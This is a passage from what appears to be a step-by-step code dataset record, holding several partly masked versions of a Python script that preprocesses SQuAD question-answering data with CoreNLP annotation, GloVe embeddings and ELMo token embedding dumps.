(pos_tags + que_pos_tags):\n pos_counter[pos_tag] += 1\n for ner_tag in (ner_tags + que_ner_tags):\n ner_counter[ner_tag] += 1\n for label in labels:\n label_counter[label] += 1\n word_emb_mat, word2idx_dict, unk_num = get_word_embedding(word_counter,\n emb_file=config.glove_word_file, emb_size=config.glove_word_size,\n vocab_size=config.vocab_size_limit, vec_size=config.glove_dim,\n vocab_file=config.vocab_file)\n char_emb_mat, char2idx_dict = get_tag_embedding(char_counter, 'char',\n vec_size=config.char_dim)\n pos_emb_mat, pos2idx_dict = get_tag_embedding(pos_counter, 'pos',\n vec_size=config.pos_dim)\n ner_emb_mat, ner2idx_dict = get_tag_embedding(ner_counter, 'ner',\n vec_size=config.ner_dim)\n label_emb_mat, label2idx_dict = get_tag_embedding(label_counter,\n 'label', vec_size=config.label_dim)\n print('{} out of {} are not in glove'.format(unk_num, len(word2idx_dict)))\n print('{} chars'.format(char_emb_mat.shape[0]))\n print('{} pos tags, {} ner tags, {} answer labels, {} chars'.format(\n pos_emb_mat.shape[0], ner_emb_mat.shape[0], label_emb_mat.shape[0],\n char_emb_mat.shape[0]))\n save(config.word_emb_file, word_emb_mat, message='word embedding')\n save(config.char_emb_file, char_emb_mat, message='char embedding')\n save(config.pos_emb_file, pos_emb_mat, message='pos embedding')\n save(config.ner_emb_file, ner_emb_mat, message='ner embedding')\n save(config.label_emb_file, label_emb_mat, message='label embedding')\n save(config.word_dictionary, word2idx_dict, message='word dictionary')\n save(config.char_dictionary, char2idx_dict, message='char dictionary')\n save(config.pos_dictionary, pos2idx_dict, message='pos dictionary')\n save(config.ner_dictionary, ner2idx_dict, message='ner dictionary')\n save(config.label_dictionary, label2idx_dict, message='label dictionary')\n print('Dump elmo word embedding...')\n token_embedding_file = config.embedding_file\n dump_token_embeddings(config.vocab_file, config.elmo_options_file,\n config.elmo_weight_file, 
token_embedding_file)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef process(json_file, outpur_dir, exclude_titles=None, include_titles=None):\n \"\"\"\n :param json_file: original data in json format\n :param outpur_dir: the output directory of pre-processed data\n :param exclude_titles: article titles to exclude\n :param include_titles: article titles to include\n \"\"\"\n para_file = '{}/paras'.format(outpur_dir)\n question_file = '{}/questions'.format(outpur_dir)\n sent_file = '{}/sents'.format(outpur_dir)\n answer_file = '{}/answers'.format(outpur_dir)\n print('Generating {} raw data...'.format(json_file))\n max_sent, max_sent_len, max_que_len, max_ans_len = 0, 0, 0, 0\n with open(json_file, 'r') as fh, corenlp.CoreNLPClient(annotators=\n 'tokenize ssplit pos ner'.split(), endpoint='http://localhost:9099',\n timeout=50000) as client:\n source = json.load(fh)\n for article in tqdm(source['data']):\n title = article['title']\n if include_titles and title not in include_titles:\n continue\n if exclude_titles and title in exclude_titles:\n continue\n for para in article['paragraphs']:\n paragraphs, questions, answers, sents, ids = [], [], [], [], []\n paragraphs_pos, questions_pos, answers_pos, sents_pos = [], [\n ], [], []\n paragraphs_ner, questions_ner, answers_ner, sents_ner = [], [\n ], [], []\n answers_index, sents_index = [], []\n context = para['context']\n if not context.strip():\n continue\n ann_para = client.annotate(context)\n max_sent = max(max_sent, len(ann_para.sentence))\n max_sent_len = max(max_sent_len, max(map(lambda x: len(x.\n token), ann_para.sentence)))\n (ann_para_tokens, paragraph_tokens, paragraph_pos,\n paragraph_ner) = [], [], [], []\n for sent in ann_para.sentence:\n for token in sent.token:\n ann_para_tokens.append(token)\n paragraph_tokens.append(token.word)\n paragraph_pos.append(token.pos)\n paragraph_ner.append(token.ner)\n for qa in para['qas']:\n ques = qa['question']\n id = qa['id']\n if not ques.strip():\n continue\n ann_que = client.annotate(ques)\n max_que_len 
= max(max_que_len, len(ann_que.sentence[0].\n token))\n question_tokens, question_pos, question_ner = [], [], []\n for sent in ann_que.sentence:\n for token in sent.token:\n question_tokens.append(token.word)\n question_pos.append(token.pos)\n question_ner.append(token.ner)\n (all_answer_tokens, all_answer_pos, all_answer_ner,\n all_answer_index) = [], [], [], []\n (all_sent_tokens, all_sent_pos, all_sent_ner,\n all_sent_index) = [], [], [], []\n for answer in qa['answers']:\n answer_text = answer['text']\n if not answer_text.strip():\n continue\n ann_ans = client.annotate(answer_text)\n answer_tokens, answer_pos, answer_ner = [], [], []\n for sent in ann_ans.sentence:\n for token in sent.token:\n answer_tokens.append(token.word)\n answer_pos.append(token.pos)\n answer_ner.append(token.ner)\n all_answer_tokens.append(' '.join(answer_tokens))\n all_answer_pos.append(' '.join(answer_pos))\n all_answer_ner.append(' '.join(answer_ner))\n answer_start = answer['answer_start']\n answer_end = answer_start + len(answer_text)\n sentence = []\n for sent in ann_para.sentence:\n if (sent.characterOffsetBegin <= answer_start <=\n sent.characterOffsetEnd or sent.\n characterOffsetBegin <= answer_end <= sent.\n characterOffsetEnd):\n sentence.append(sent)\n sentence = [token for sent in sentence for token in\n sent.token]\n sentence_tokens = [token.word for token in sentence]\n sentence_pos = [token.pos for token in sentence]\n sentence_ner = [token.ner for token in sentence]\n all_sent_tokens.append(' '.join(sentence_tokens))\n all_sent_pos.append(' '.join(sentence_pos))\n all_sent_ner.append(' '.join(sentence_ner))\n y1_sent = sentence[0].tokenBeginIndex\n y2_sent = sentence[-1].tokenBeginIndex\n y1_ans = None\n for i, token in enumerate(sentence):\n if (token.beginChar - 1 <= answer_start <=\n token.endChar):\n y1_ans = sentence[0].tokenBeginIndex + i\n try:\n assert y1_ans != None\n except:\n continue\n y2_ans = y1_ans + len(answer_tokens) - 1\n 
all_answer_index.append('{},{}'.format(y1_ans, y2_ans))\n all_sent_index.append('{},{}'.format(y1_sent, y2_sent))\n paragraphs.append(' '.join(paragraph_tokens))\n paragraphs_pos.append(' '.join(paragraph_pos))\n paragraphs_ner.append(' '.join(paragraph_ner))\n questions.append(' '.join(question_tokens))\n questions_pos.append(' '.join(question_pos))\n questions_ner.append(' '.join(question_ner))\n answers.append('\\t'.join(all_answer_tokens))\n answers_pos.append('\\t'.join(all_answer_pos))\n answers_ner.append('\\t'.join(all_answer_ner))\n answers_index.append('\\t'.join(all_answer_index))\n sents.append('\\t'.join(all_sent_tokens))\n sents_pos.append('\\t'.join(all_sent_pos))\n sents_ner.append('\\t'.join(all_sent_ner))\n sents_index.append('\\t'.join(all_sent_index))\n ids.append(id)\n with open('{}.tok'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs) + '\\n')\n with open('{}.pos'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs_pos) + '\\n')\n with open('{}.ner'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs_ner) + '\\n')\n with open('{}.id'.format(para_file), 'a') as f:\n f.write('\\n'.join(ids) + '\\n')\n with open('{}.tok'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions) + '\\n')\n with open('{}.pos'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions_pos) + '\\n')\n with open('{}.ner'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions_ner) + '\\n')\n with open('{}.tok'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers) + '\\n')\n with open('{}.pos'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_pos) + '\\n')\n with open('{}.ner'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_ner) + '\\n')\n with open('{}.index'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_index) + '\\n')\n with open('{}.tok'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents) + '\\n')\n with open('{}.pos'.format(sent_file), 'a') as f:\n 
f.write('\\n'.join(sents_pos) + '\\n')\n with open('{}.ner'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_ner) + '\\n')\n with open('{}.index'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_index) + '\\n')\n label(para_file, answer_file)\n\n\ndef label(para_file, answer_file):\n max_node = 0\n with open('{}.tok'.format(para_file), 'r') as fp, open('{}.label'.\n format(para_file), 'a') as fl, open('{}.index'.format(answer_file), 'r'\n ) as fa:\n while True:\n para = fp.readline()\n if not para:\n break\n words = [p for p in para.strip().split(' ')]\n max_node = max(len(words), max_node)\n answer = fa.readline()\n labels = []\n try:\n start, end = map(int, answer.split('\\t')[0].split(','))\n for i in range(len(words)):\n if start <= i <= end:\n if i == start:\n labels.append('B')\n else:\n labels.append('I')\n else:\n labels.append('O')\n except:\n pass\n fl.write(' '.join(labels) + '\\n')\n return max_node\n\n\ndef get_data(train_json, dev_json, test_title_file, output_dir):\n test_titles = open(test_title_file, 'r').readlines()\n test_titles = set([line.strip() for line in test_titles])\n process(train_json, '{}/train/'.format(output_dir), exclude_titles=\n test_titles)\n process(dev_json, '{}/dev/'.format(output_dir))\n process(train_json, '{}/test/'.format(output_dir), include_titles=\n test_titles)\n\n\ndef get_word_embedding(counter, emb_file, emb_size, vocab_size, vec_size,\n vocab_file):\n \"\"\"\n get word embedding matrix from glove\n \"\"\"\n print('Generating word embedding...')\n embedding_dict = {}\n with open(emb_file, 'r', encoding='utf-8') as fh:\n for line in tqdm(fh, total=emb_size):\n array = line.split()\n word = ''.join(array[0:-vec_size])\n vector = list(map(float, array[-vec_size:]))\n embedding_dict[word] = vector\n TRANSLATE = {'-lsb-': '[', '-rsb-': ']', '-lrb-': '(', '-rrb-': ')',\n '-lcb-': '{', '-rcb-': '}', '-LSB-': '[', '-RSB-': ']', '-LRB-':\n '(', '-RRB-': ')', '-LCB-': '{', '-RCB-': '}'}\n SPECIAL_TOKENS = 
['<NULL>', '<UNK>', '<S>', '</S>']\n words = list(map(lambda x: x[0], sorted(counter.items(), key=lambda x:\n x[1], reverse=True)))\n words = SPECIAL_TOKENS + words\n if vocab_size > 0:\n words = words[:vocab_size]\n with open(vocab_file, 'w') as f:\n f.write('\\n'.join(words[1:]))\n embedding = np.random.normal(scale=0.1, size=(len(words), vec_size))\n word2idx_dict = {}\n unknown_count = 0\n for i, word in enumerate(words):\n word2idx_dict[word] = i\n if word in TRANSLATE:\n word = TRANSLATE[word]\n done = False\n for w in (word, word.lower(), word.upper(), word.capitalize()):\n if w in embedding_dict:\n embedding[i] = embedding_dict[w]\n done = True\n break\n if not done:\n unknown_count += 1\n return embedding, word2idx_dict, unknown_count\n\n\ndef get_tag_embedding(counter, data_type, vec_size):\n \"\"\"\n get pos/ner/label tags' embedding matrix\n \"\"\"\n print('Generating {} tag embedding...'.format(data_type))\n SPECIAL_TOKENS = ['<NULL>', '<UNK>']\n tags = list(map(lambda x: x[0], sorted(counter.items(), key=lambda x: x\n [1], reverse=True)))\n tags = SPECIAL_TOKENS + tags\n embedding = np.random.normal(scale=0.1, size=(len(tags), vec_size))\n word2idx_dict = {w: i for i, w in enumerate(tags)}\n return embedding, word2idx_dict\n\n\ndef get_vocab(config):\n print('Get the vocabulary...')\n word_counter, char_counter = Counter(), Counter()\n pos_counter, ner_counter, label_counter = Counter(), Counter(), Counter()\n files = [(config.train_para_file, config.train_question_file), (config.\n dev_para_file, config.dev_question_file)]\n for para_file, que_file in files:\n with open('{}.tok'.format(para_file), 'r') as fp, open('{}.tok'.\n format(que_file), 'r') as fq, open('{}.pos'.format(para_file), 'r'\n ) as fpp, open('{}.pos'.format(que_file), 'r') as fqp, open(\n '{}.ner'.format(para_file), 'r') as fpn, open('{}.ner'.format(\n que_file), 'r') as fqn, open('{}.label'.format(para_file), 'r'\n ) as fpl:\n while True:\n para, question = fp.readline(), 
fq.readline()\n pos, que_pos = fpp.readline(), fqp.readline()\n ner, que_ner = fpn.readline(), fqn.readline()\n label = fpl.readline()\n if not question or not para:\n break\n if config.lower_word:\n para = para.lower()\n question = question.lower()\n para_tokens = para.strip().split(' ')\n que_tokens = question.strip().split(' ')\n pos_tags = pos.strip().split(' ')\n ner_tags = ner.strip().split(' ')\n que_pos_tags = que_pos.strip().split(' ')\n que_ner_tags = que_ner.strip().split(' ')\n labels = label.strip().split(' ')\n for token in (para_tokens + que_tokens):\n word_counter[token] += 1\n for char in list(token):\n char_counter[char] += 1\n for pos_tag in (pos_tags + que_pos_tags):\n pos_counter[pos_tag] += 1\n for ner_tag in (ner_tags + que_ner_tags):\n ner_counter[ner_tag] += 1\n for label in labels:\n label_counter[label] += 1\n word_emb_mat, word2idx_dict, unk_num = get_word_embedding(word_counter,\n emb_file=config.glove_word_file, emb_size=config.glove_word_size,\n vocab_size=config.vocab_size_limit, vec_size=config.glove_dim,\n vocab_file=config.vocab_file)\n char_emb_mat, char2idx_dict = get_tag_embedding(char_counter, 'char',\n vec_size=config.char_dim)\n pos_emb_mat, pos2idx_dict = get_tag_embedding(pos_counter, 'pos',\n vec_size=config.pos_dim)\n ner_emb_mat, ner2idx_dict = get_tag_embedding(ner_counter, 'ner',\n vec_size=config.ner_dim)\n label_emb_mat, label2idx_dict = get_tag_embedding(label_counter,\n 'label', vec_size=config.label_dim)\n print('{} out of {} are not in glove'.format(unk_num, len(word2idx_dict)))\n print('{} chars'.format(char_emb_mat.shape[0]))\n print('{} pos tags, {} ner tags, {} answer labels, {} chars'.format(\n pos_emb_mat.shape[0], ner_emb_mat.shape[0], label_emb_mat.shape[0],\n char_emb_mat.shape[0]))\n save(config.word_emb_file, word_emb_mat, message='word embedding')\n save(config.char_emb_file, char_emb_mat, message='char embedding')\n save(config.pos_emb_file, pos_emb_mat, message='pos embedding')\n 
save(config.ner_emb_file, ner_emb_mat, message='ner embedding')\n save(config.label_emb_file, label_emb_mat, message='label embedding')\n save(config.word_dictionary, word2idx_dict, message='word dictionary')\n save(config.char_dictionary, char2idx_dict, message='char dictionary')\n save(config.pos_dictionary, pos2idx_dict, message='pos dictionary')\n save(config.ner_dictionary, ner2idx_dict, message='ner dictionary')\n save(config.label_dictionary, label2idx_dict, message='label dictionary')\n print('Dump elmo word embedding...')\n token_embedding_file = config.embedding_file\n dump_token_embeddings(config.vocab_file, config.elmo_options_file,\n config.elmo_weight_file, token_embedding_file)\n\n\n<mask token>\n",
"step-3": "<mask token>\nsys.path.append('../..')\n<mask token>\n\n\ndef process(json_file, outpur_dir, exclude_titles=None, include_titles=None):\n \"\"\"\n :param json_file: original data in json format\n :param outpur_dir: the output directory of pre-processed data\n :param exclude_titles: article titles to exclude\n :param include_titles: article titles to include\n \"\"\"\n para_file = '{}/paras'.format(outpur_dir)\n question_file = '{}/questions'.format(outpur_dir)\n sent_file = '{}/sents'.format(outpur_dir)\n answer_file = '{}/answers'.format(outpur_dir)\n print('Generating {} raw data...'.format(json_file))\n max_sent, max_sent_len, max_que_len, max_ans_len = 0, 0, 0, 0\n with open(json_file, 'r') as fh, corenlp.CoreNLPClient(annotators=\n 'tokenize ssplit pos ner'.split(), endpoint='http://localhost:9099',\n timeout=50000) as client:\n source = json.load(fh)\n for article in tqdm(source['data']):\n title = article['title']\n if include_titles and title not in include_titles:\n continue\n if exclude_titles and title in exclude_titles:\n continue\n for para in article['paragraphs']:\n paragraphs, questions, answers, sents, ids = [], [], [], [], []\n paragraphs_pos, questions_pos, answers_pos, sents_pos = [], [\n ], [], []\n paragraphs_ner, questions_ner, answers_ner, sents_ner = [], [\n ], [], []\n answers_index, sents_index = [], []\n context = para['context']\n if not context.strip():\n continue\n ann_para = client.annotate(context)\n max_sent = max(max_sent, len(ann_para.sentence))\n max_sent_len = max(max_sent_len, max(map(lambda x: len(x.\n token), ann_para.sentence)))\n (ann_para_tokens, paragraph_tokens, paragraph_pos,\n paragraph_ner) = [], [], [], []\n for sent in ann_para.sentence:\n for token in sent.token:\n ann_para_tokens.append(token)\n paragraph_tokens.append(token.word)\n paragraph_pos.append(token.pos)\n paragraph_ner.append(token.ner)\n for qa in para['qas']:\n ques = qa['question']\n id = qa['id']\n if not ques.strip():\n continue\n 
ann_que = client.annotate(ques)\n max_que_len = max(max_que_len, len(ann_que.sentence[0].\n token))\n question_tokens, question_pos, question_ner = [], [], []\n for sent in ann_que.sentence:\n for token in sent.token:\n question_tokens.append(token.word)\n question_pos.append(token.pos)\n question_ner.append(token.ner)\n (all_answer_tokens, all_answer_pos, all_answer_ner,\n all_answer_index) = [], [], [], []\n (all_sent_tokens, all_sent_pos, all_sent_ner,\n all_sent_index) = [], [], [], []\n for answer in qa['answers']:\n answer_text = answer['text']\n if not answer_text.strip():\n continue\n ann_ans = client.annotate(answer_text)\n answer_tokens, answer_pos, answer_ner = [], [], []\n for sent in ann_ans.sentence:\n for token in sent.token:\n answer_tokens.append(token.word)\n answer_pos.append(token.pos)\n answer_ner.append(token.ner)\n all_answer_tokens.append(' '.join(answer_tokens))\n all_answer_pos.append(' '.join(answer_pos))\n all_answer_ner.append(' '.join(answer_ner))\n answer_start = answer['answer_start']\n answer_end = answer_start + len(answer_text)\n sentence = []\n for sent in ann_para.sentence:\n if (sent.characterOffsetBegin <= answer_start <=\n sent.characterOffsetEnd or sent.\n characterOffsetBegin <= answer_end <= sent.\n characterOffsetEnd):\n sentence.append(sent)\n sentence = [token for sent in sentence for token in\n sent.token]\n sentence_tokens = [token.word for token in sentence]\n sentence_pos = [token.pos for token in sentence]\n sentence_ner = [token.ner for token in sentence]\n all_sent_tokens.append(' '.join(sentence_tokens))\n all_sent_pos.append(' '.join(sentence_pos))\n all_sent_ner.append(' '.join(sentence_ner))\n y1_sent = sentence[0].tokenBeginIndex\n y2_sent = sentence[-1].tokenBeginIndex\n y1_ans = None\n for i, token in enumerate(sentence):\n if (token.beginChar - 1 <= answer_start <=\n token.endChar):\n y1_ans = sentence[0].tokenBeginIndex + i\n try:\n assert y1_ans != None\n except:\n continue\n y2_ans = y1_ans + 
len(answer_tokens) - 1\n all_answer_index.append('{},{}'.format(y1_ans, y2_ans))\n all_sent_index.append('{},{}'.format(y1_sent, y2_sent))\n paragraphs.append(' '.join(paragraph_tokens))\n paragraphs_pos.append(' '.join(paragraph_pos))\n paragraphs_ner.append(' '.join(paragraph_ner))\n questions.append(' '.join(question_tokens))\n questions_pos.append(' '.join(question_pos))\n questions_ner.append(' '.join(question_ner))\n answers.append('\\t'.join(all_answer_tokens))\n answers_pos.append('\\t'.join(all_answer_pos))\n answers_ner.append('\\t'.join(all_answer_ner))\n answers_index.append('\\t'.join(all_answer_index))\n sents.append('\\t'.join(all_sent_tokens))\n sents_pos.append('\\t'.join(all_sent_pos))\n sents_ner.append('\\t'.join(all_sent_ner))\n sents_index.append('\\t'.join(all_sent_index))\n ids.append(id)\n with open('{}.tok'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs) + '\\n')\n with open('{}.pos'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs_pos) + '\\n')\n with open('{}.ner'.format(para_file), 'a') as f:\n f.write('\\n'.join(paragraphs_ner) + '\\n')\n with open('{}.id'.format(para_file), 'a') as f:\n f.write('\\n'.join(ids) + '\\n')\n with open('{}.tok'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions) + '\\n')\n with open('{}.pos'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions_pos) + '\\n')\n with open('{}.ner'.format(question_file), 'a') as f:\n f.write('\\n'.join(questions_ner) + '\\n')\n with open('{}.tok'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers) + '\\n')\n with open('{}.pos'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_pos) + '\\n')\n with open('{}.ner'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_ner) + '\\n')\n with open('{}.index'.format(answer_file), 'a') as f:\n f.write('\\n'.join(answers_index) + '\\n')\n with open('{}.tok'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents) + '\\n')\n with 
open('{}.pos'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_pos) + '\\n')\n with open('{}.ner'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_ner) + '\\n')\n with open('{}.index'.format(sent_file), 'a') as f:\n f.write('\\n'.join(sents_index) + '\\n')\n label(para_file, answer_file)\n\n\ndef label(para_file, answer_file):\n max_node = 0\n with open('{}.tok'.format(para_file), 'r') as fp, open('{}.label'.\n format(para_file), 'a') as fl, open('{}.index'.format(answer_file), 'r'\n ) as fa:\n while True:\n para = fp.readline()\n if not para:\n break\n words = [p for p in para.strip().split(' ')]\n max_node = max(len(words), max_node)\n answer = fa.readline()\n labels = []\n try:\n start, end = map(int, answer.split('\\t')[0].split(','))\n for i in range(len(words)):\n if start <= i <= end:\n if i == start:\n labels.append('B')\n else:\n labels.append('I')\n else:\n labels.append('O')\n except:\n pass\n fl.write(' '.join(labels) + '\\n')\n return max_node\n\n\ndef get_data(train_json, dev_json, test_title_file, output_dir):\n test_titles = open(test_title_file, 'r').readlines()\n test_titles = set([line.strip() for line in test_titles])\n process(train_json, '{}/train/'.format(output_dir), exclude_titles=\n test_titles)\n process(dev_json, '{}/dev/'.format(output_dir))\n process(train_json, '{}/test/'.format(output_dir), include_titles=\n test_titles)\n\n\ndef get_word_embedding(counter, emb_file, emb_size, vocab_size, vec_size,\n vocab_file):\n \"\"\"\n get word embedding matrix from glove\n \"\"\"\n print('Generating word embedding...')\n embedding_dict = {}\n with open(emb_file, 'r', encoding='utf-8') as fh:\n for line in tqdm(fh, total=emb_size):\n array = line.split()\n word = ''.join(array[0:-vec_size])\n vector = list(map(float, array[-vec_size:]))\n embedding_dict[word] = vector\n TRANSLATE = {'-lsb-': '[', '-rsb-': ']', '-lrb-': '(', '-rrb-': ')',\n '-lcb-': '{', '-rcb-': '}', '-LSB-': '[', '-RSB-': ']', '-LRB-':\n '(', '-RRB-': ')', 
'-LCB-': '{', '-RCB-': '}'}\n SPECIAL_TOKENS = ['<NULL>', '<UNK>', '<S>', '</S>']\n words = list(map(lambda x: x[0], sorted(counter.items(), key=lambda x:\n x[1], reverse=True)))\n words = SPECIAL_TOKENS + words\n if vocab_size > 0:\n words = words[:vocab_size]\n with open(vocab_file, 'w') as f:\n f.write('\\n'.join(words[1:]))\n embedding = np.random.normal(scale=0.1, size=(len(words), vec_size))\n word2idx_dict = {}\n unknown_count = 0\n for i, word in enumerate(words):\n word2idx_dict[word] = i\n if word in TRANSLATE:\n word = TRANSLATE[word]\n done = False\n for w in (word, word.lower(), word.upper(), word.capitalize()):\n if w in embedding_dict:\n embedding[i] = embedding_dict[w]\n done = True\n break\n if not done:\n unknown_count += 1\n return embedding, word2idx_dict, unknown_count\n\n\ndef get_tag_embedding(counter, data_type, vec_size):\n \"\"\"\n get pos/ner/label tags' embedding matrix\n \"\"\"\n print('Generating {} tag embedding...'.format(data_type))\n SPECIAL_TOKENS = ['<NULL>', '<UNK>']\n tags = list(map(lambda x: x[0], sorted(counter.items(), key=lambda x: x\n [1], reverse=True)))\n tags = SPECIAL_TOKENS + tags\n embedding = np.random.normal(scale=0.1, size=(len(tags), vec_size))\n word2idx_dict = {w: i for i, w in enumerate(tags)}\n return embedding, word2idx_dict\n\n\ndef get_vocab(config):\n print('Get the vocabulary...')\n word_counter, char_counter = Counter(), Counter()\n pos_counter, ner_counter, label_counter = Counter(), Counter(), Counter()\n files = [(config.train_para_file, config.train_question_file), (config.\n dev_para_file, config.dev_question_file)]\n for para_file, que_file in files:\n with open('{}.tok'.format(para_file), 'r') as fp, open('{}.tok'.\n format(que_file), 'r') as fq, open('{}.pos'.format(para_file), 'r'\n ) as fpp, open('{}.pos'.format(que_file), 'r') as fqp, open(\n '{}.ner'.format(para_file), 'r') as fpn, open('{}.ner'.format(\n que_file), 'r') as fqn, open('{}.label'.format(para_file), 'r'\n ) as fpl:\n while 
True:\n para, question = fp.readline(), fq.readline()\n pos, que_pos = fpp.readline(), fqp.readline()\n ner, que_ner = fpn.readline(), fqn.readline()\n label = fpl.readline()\n if not question or not para:\n break\n if config.lower_word:\n para = para.lower()\n question = question.lower()\n para_tokens = para.strip().split(' ')\n que_tokens = question.strip().split(' ')\n pos_tags = pos.strip().split(' ')\n ner_tags = ner.strip().split(' ')\n que_pos_tags = que_pos.strip().split(' ')\n que_ner_tags = que_ner.strip().split(' ')\n labels = label.strip().split(' ')\n for token in (para_tokens + que_tokens):\n word_counter[token] += 1\n for char in list(token):\n char_counter[char] += 1\n for pos_tag in (pos_tags + que_pos_tags):\n pos_counter[pos_tag] += 1\n for ner_tag in (ner_tags + que_ner_tags):\n ner_counter[ner_tag] += 1\n for label in labels:\n label_counter[label] += 1\n word_emb_mat, word2idx_dict, unk_num = get_word_embedding(word_counter,\n emb_file=config.glove_word_file, emb_size=config.glove_word_size,\n vocab_size=config.vocab_size_limit, vec_size=config.glove_dim,\n vocab_file=config.vocab_file)\n char_emb_mat, char2idx_dict = get_tag_embedding(char_counter, 'char',\n vec_size=config.char_dim)\n pos_emb_mat, pos2idx_dict = get_tag_embedding(pos_counter, 'pos',\n vec_size=config.pos_dim)\n ner_emb_mat, ner2idx_dict = get_tag_embedding(ner_counter, 'ner',\n vec_size=config.ner_dim)\n label_emb_mat, label2idx_dict = get_tag_embedding(label_counter,\n 'label', vec_size=config.label_dim)\n print('{} out of {} are not in glove'.format(unk_num, len(word2idx_dict)))\n print('{} chars'.format(char_emb_mat.shape[0]))\n print('{} pos tags, {} ner tags, {} answer labels, {} chars'.format(\n pos_emb_mat.shape[0], ner_emb_mat.shape[0], label_emb_mat.shape[0],\n char_emb_mat.shape[0]))\n save(config.word_emb_file, word_emb_mat, message='word embedding')\n save(config.char_emb_file, char_emb_mat, message='char embedding')\n save(config.pos_emb_file, pos_emb_mat, 
message='pos embedding')\n save(config.ner_emb_file, ner_emb_mat, message='ner embedding')\n save(config.label_emb_file, label_emb_mat, message='label embedding')\n save(config.word_dictionary, word2idx_dict, message='word dictionary')\n save(config.char_dictionary, char2idx_dict, message='char dictionary')\n save(config.pos_dictionary, pos2idx_dict, message='pos dictionary')\n save(config.ner_dictionary, ner2idx_dict, message='ner dictionary')\n save(config.label_dictionary, label2idx_dict, message='label dictionary')\n print('Dump elmo word embedding...')\n token_embedding_file = config.embedding_file\n dump_token_embeddings(config.vocab_file, config.elmo_options_file,\n config.elmo_weight_file, token_embedding_file)\n\n\nif __name__ == '__main__':\n os.system(\n 'mkdir data; mkdir data/processed; mkdir data/processed/train; mkdir data/processed/dev; mkdir data/processed/test'\n )\n get_data('../../LIB/squad/train-v1.1.json',\n '../../LIB/squad/dev-v1.1.json', '../../LIB/squad/doclist-test.txt',\n 'data/processed')\n",
"step-4": "<mask token>\nimport os\nimport corenlp\nimport numpy as np\nimport ujson as json\nfrom tqdm import tqdm\nfrom collections import Counter\nfrom bilm import dump_token_embeddings\nimport sys\nsys.path.append('../..')\nfrom LIB.utils import save\n\n\ndef process(json_file, outpur_dir, exclude_titles=None, include_titles=None):\n \"\"\"\n :param json_file: original data in json format\n :param outpur_dir: the output directory of pre-processed data\n :param exclude_titles: article titles to exclude\n :param include_titles: article titles to include\n \"\"\"\n para_file = '{}/paras'.format(outpur_dir)\n question_file = '{}/questions'.format(outpur_dir)\n sent_file = '{}/sents'.format(outpur_dir)\n answer_file = '{}/answers'.format(outpur_dir)\n print('Generating {} raw data...'.format(json_file))\n max_sent, max_sent_len, max_que_len, max_ans_len = 0, 0, 0, 0\n with open(json_file, 'r') as fh, corenlp.CoreNLPClient(annotators=\n 'tokenize ssplit pos ner'.split(), endpoint='http://localhost:9099',\n timeout=50000) as client:\n source = json.load(fh)\n for article in tqdm(source['data']):\n title = article['title']\n if include_titles and title not in include_titles:\n continue\n if exclude_titles and title in exclude_titles:\n continue\n for para in article['paragraphs']:\n paragraphs, questions, answers, sents, ids = [], [], [], [], []\n paragraphs_pos, questions_pos, answers_pos, sents_pos = [], [\n ], [], []\n paragraphs_ner, questions_ner, answers_ner, sents_ner = [], [\n ], [], []\n answers_index, sents_index = [], []\n context = para['context']\n if not context.strip():\n continue\n ann_para = client.annotate(context)\n max_sent = max(max_sent, len(ann_para.sentence))\n max_sent_len = max(max_sent_len, max(map(lambda x: len(x.\n token), ann_para.sentence)))\n (ann_para_tokens, paragraph_tokens, paragraph_pos,\n paragraph_ner) = [], [], [], []\n for sent in ann_para.sentence:\n for token in sent.token:\n ann_para_tokens.append(token)\n 
paragraph_tokens.append(token.word)\n paragraph_pos.append(token.pos)\n paragraph_ner.append(token.ner)\n for qa in para['qas']:\n ques = qa['question']\n id = qa['id']\n if not ques.strip():\n continue\n ann_que = client.annotate(ques)\n max_que_len = max(max_que_len, len(ann_que.sentence[0].\n token))\n question_tokens, question_pos, question_ner = [], [], []\n for sent in ann_que.sentence:\n for token in sent.token:\n question_tokens.append(token.word)\n question_pos.append(token.pos)\n question_ner.append(token.ner)\n (all_answer_tokens, all_answer_pos, all_answer_ner,\n all_answer_index) = [], [], [], []\n (all_sent_tokens, all_sent_pos, all_sent_ner,\n all_sent_index) = [], [], [], []\n for answer in qa['answers']:\n answer_text = answer['text']\n if not answer_text.strip():\n continue\n ann_ans = client.annotate(answer_text)\n answer_tokens, answer_pos, answer_ner = [], [], []\n for sent in ann_ans.sentence:\n for token in sent.token:\n answer_tokens.append(token.word)\n answer_pos.append(token.pos)\n answer_ner.append(token.ner)\n all_answer_tokens.append(' '.join(answer_tokens))\n all_answer_pos.append(' '.join(answer_pos))\n all_answer_ner.append(' '.join(answer_ner))\n answer_start = answer['answer_start']\n answer_end = answer_start + len(answer_text)\n sentence = []\n for sent in ann_para.sentence:\n if (sent.characterOffsetBegin <= answer_start <=\n sent.characterOffsetEnd or sent.\n characterOffsetBegin <= answer_end <= sent.\n characterOffsetEnd):\n sentence.append(sent)\n sentence = [token for sent in sentence for token in\n sent.token]\n sentence_tokens = [token.word for token in sentence]\n sentence_pos = [token.pos for token in sentence]\n sentence_ner = [token.ner for token in sentence]\n all_sent_tokens.append(' '.join(sentence_tokens))\n all_sent_pos.append(' '.join(sentence_pos))\n all_sent_ner.append(' '.join(sentence_ner))\n y1_sent = 